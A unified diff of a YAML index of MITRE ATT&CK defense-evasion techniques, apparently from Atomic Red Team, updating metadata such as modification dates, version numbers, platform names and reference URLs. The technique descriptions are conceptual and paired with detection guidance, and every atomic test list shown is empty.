+        url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+      - source_name: DFIR Report Trickbot June 2023
+        description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+          Retrieved May 31, 2024.
+        url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -11632,10 +11888,9 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -11672,40 +11927,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.002:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
-      type: attack-pattern
-      created: '2020-05-14T14:45:15.978Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.002
-        url: https://attack.mitre.org/techniques/T1578/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.416Z'
       name: Create Cloud Instance
       description: |-
         An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -11714,20 +11939,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the creation of an instance in the <code>RunInstances</code> event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances create</code> to create a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Creation'
       - 'Instance: Instance Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+      created: '2020-05-14T14:45:15.978Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/002
+        external_id: T1578.002
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.009:
     technique:
@@ -11757,7 +12012,7 @@ defense-evasion:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -11800,8 +12055,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1601.001:
     technique:
@@ -11848,7 +12101,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:46.560Z'
       name: Patch System Image
       description: "Adversaries may modify the operating system of a network device
         to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -11914,12 +12167,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T22:30:01.227Z'
       name: Clear Persistence
       description: |-
         Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -11974,33 +12225,84 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
-  T1556.001:
+  T1036.010:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-10-17T15:20:36.705Z'
+      name: Masquerade Account Name
+      description: "Adversaries may match or approximate the names of legitimate accounts
+        to make newly created ones appear benign. This will typically occur during
+        [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+        may also be renamed at a later date. This may also coincide with [Account
+        Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+        deletes an account before re-creating one with the same name.(Citation: Huntress
+        MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+        such as those associated with legitimate software, data backups, or container
+        cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+        Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+        such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+        2024) Sometimes adversaries may model account names off of those already existing
+        in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+        \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+        which describes impersonating specific trusted individuals or organizations,
+        rather than user or service account names.  "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Menachem Goldstein
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - SaaS
+      - IaaS
+      - Containers
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Creation'
       type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
+      id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+      created: '2024-08-05T21:39:16.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1036/010
+        external_id: T1036.010
+      - source_name: Elastic CUBA Ransomware 2022
+        description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+          Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+          August 5, 2024.
+        url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+      - source_name: Invictus IR Cloud Ransomware 2024
+        description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+          August 5, 2024.
+        url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+      - source_name: Huntress MOVEit 2023
+        description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+          CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+        url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+      - source_name: Aquasec Kubernetes Attack 2023
+        description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+          Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+          2023.
+        url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.001:
+    technique:
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -12021,6 +12323,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -12035,22 +12338,42 @@ defense-evasion:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.006:
     technique:
-      modified: '2023-07-14T14:01:41.475Z'
+      modified: '2024-09-12T19:12:13.006Z'
       name: HTML Smuggling
       description: |-
         Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
@@ -12108,48 +12431,17 @@ defense-evasion:
         url: https://www.menlosecurity.com/blog/new-attack-alert-duri
       - source_name: nccgroup Smuggling HTA 2017
         description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
-          Explorer/Edge. Retrieved May 20, 2021.
-        url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+          Explorer/Edge. Retrieved September 12, 2024.
+        url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.006
     atomic_tests: []
   T1556.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
-      type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -12171,6 +12463,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -12181,23 +12474,50 @@ defense-evasion:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:43:18.873Z'
       name: Command Obfuscation
       description: |-
         Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
@@ -12238,8 +12558,9 @@ defense-evasion:
         url: https://attack.mitre.org/techniques/T1027/010
         external_id: T1027.010
       - source_name: Twitter Richard WMIC
-        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
-        url: https://twitter.com/rfackroyd/status/1639136000755765254
+        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+          2024.
+        url: https://x.com/rfackroyd/status/1639136000755765254
       - source_name: Invoke-Obfuscation
         description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
           March 17, 2023.
@@ -12275,43 +12596,23 @@ defense-evasion:
         url: https://redcanary.com/threat-detection-report/techniques/powershell/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1070.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Walker Johnson
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
-      created: '2020-01-31T12:35:36.479Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.004
-        url: https://attack.mitre.org/techniques/T1070/004
-      - source_name: Microsoft SDelete July 2016
-        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
-        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
-          8, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:33:59.107Z'
+      name: 'Indicator Removal on Host: File Deletion'
       description: |-
         Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
 
         There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Indicator Removal on Host: File Deletion'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Walker Johnson
+      x_mitre_deprecated: false
       x_mitre_detection: It may be uncommon for events related to benign command-line
         functions such as DEL or third-party utilities or tools to be found in an
         environment, depending on the user base and how systems are typically used.
@@ -12322,18 +12623,36 @@ defense-evasion:
         network that an adversary could introduce. Some monitoring tools may collect
         command-line arguments, but may not capture DEL commands since DEL is a native
         function within cmd.exe.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Deletion'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+      created: '2020-01-31T12:35:36.479Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/004
+        external_id: T1070.004
+      - source_name: Microsoft SDelete July 2016
+        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+          8, 2018.
+        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.004
     atomic_tests: []
   T1221:
@@ -12395,7 +12714,7 @@ defense-evasion:
         description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
           2018.
         source_name: ryhanson phishery SEPT 2016
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-12T18:16:56.176Z'
       name: Template Injection
       description: |-
         Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
@@ -12425,13 +12744,11 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1221
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -12528,7 +12845,6 @@ defense-evasion:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1027.002:
     technique:
@@ -12591,7 +12907,6 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1027.002
     atomic_tests: []
   T1564.005:
@@ -12629,7 +12944,7 @@ defense-evasion:
         description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
           Equation Group: Questions and Answers. Retrieved December 21, 2015.'
         url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-29T15:12:11.024Z'
       name: Hidden File System
       description: |-
         Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -12656,8 +12971,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1055.005:
     technique:
@@ -12685,7 +12998,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -12729,8 +13042,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1622:
     technique:
@@ -12785,7 +13096,7 @@ defense-evasion:
